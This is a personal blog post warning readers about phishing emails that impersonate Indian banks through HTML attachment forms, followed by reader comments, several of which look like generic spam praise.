Today morning was just about going as usual till I noticed an email. It seemed to originate from AXIS bank and it had an HTML attachment and it was an important announcement.
The contents of the email looked valid considering Government of India had placed a ban on sending of bulk SMS till 29th. Now I am not sure if such ban holds good for financial institutions. But some smart bloke seems to have capitalized on this ban. The email stated that:
Now unlike the other phishing emails that I have encountered this one seemed different and the content (read grammar) also looks more in line from a professional agency and in tandem with the events that are happening in India.
This is the snapshot of the email:
I opened the HTML attachment, after a customary scan from AV. Now although this looks authentic, but is a bit suspicious because it is asking for too many private details that should evoke second thoughts from anybody. Generally any phishing attack would ask for username, password, cvv details at the max. But this one is prompting for ATM PIN,Transaction password, Secure Code/Verified by Visa, Email details. And unlike others where you enter the details on a site, it is sending an attachment to be filled and submitted. Modus Operandi is slightly different.
I bet someone who is familiar with Axis bank’s online transaction mechanism has set this up because Axis bank requires transaction password in addition to the details mentioned above for a online transaction. Now, the form is a html attachment and when you open everything looks authentic just take a look below.
This is it, but once you look at the page source carefully you will realize the bait. Using the POST method, all details would go to the URL specified instead of Axis bank:
A Whois lookup for the domain above lists that is based out of Poland. All I can do is just notify Axis bank of this. It would have been better if the Government of India or the financial institutions have had made it clear if their services would continue to operate or be impeded due to this SMS ban.
Take care and please spread a word to ensure people do not fall for this
UPDATE:
I would have thought that the content in their email was written by a smart bloke, but it’s actually flicked from Axis Bank’s login page!
11 October
Received another Phishing email with the similar modus operandi , this time targeting ICICI Bank and hosted at:
17th October
Another day, another Phishing email. The phishers are just not leaving any stone unturned as they target every bank with an online presence, this time targeting customers of HDFC Bank and hosted at:
Here is the Phished URL:
Oh Wait..I think I just saw a similar email targeting Punjab National Banks’s customers land in my inbox!….
Can you please share the details . I am LEO ( Law Enforcement Officer ) . Our unit delas with similar crime. May be we would be able to pass this info to our counterparts in Polland , after we have prima facie found it to be phishing attack. can you forward mail at mentioned above.
Forwarding the email will lose all its header rendering it useless. If the header could be extracted and sent we could try to see where the email originated from.
Of-course it’s possible to retrieve the header and forward it. Just like the random domains used for hosting such phishing sites, the IP addresses used for sending such emails also change rapidly with time. According to Fraudwatch, the average uptime of a phishing site is 52 hours only!
Nice to finally find some decent writing in this sea of mediocrity! Thanks for taking the time to post.
Nicely said. Have tweeted.
Thanks for the excellent post. I love reading it!
Your blog is exactly what I’ve been trying to get. It’s a very enlightening read. If every blogger would be as visitor specific as you, life could be so much easier.
I am not sure where you’re getting your info, but great topic. I needs to spend some time learning much more or understanding more. Thanks for great information I was looking for this information for my mission.
I wish more people would write blogs like this that are really fun to read. With all the fluff floating around on the net, it is rare to read a blog like this instead.
Another excellent publish on running a blog! Thanks therefore much to take the time to share a person data as well as knowledge with other bloggers.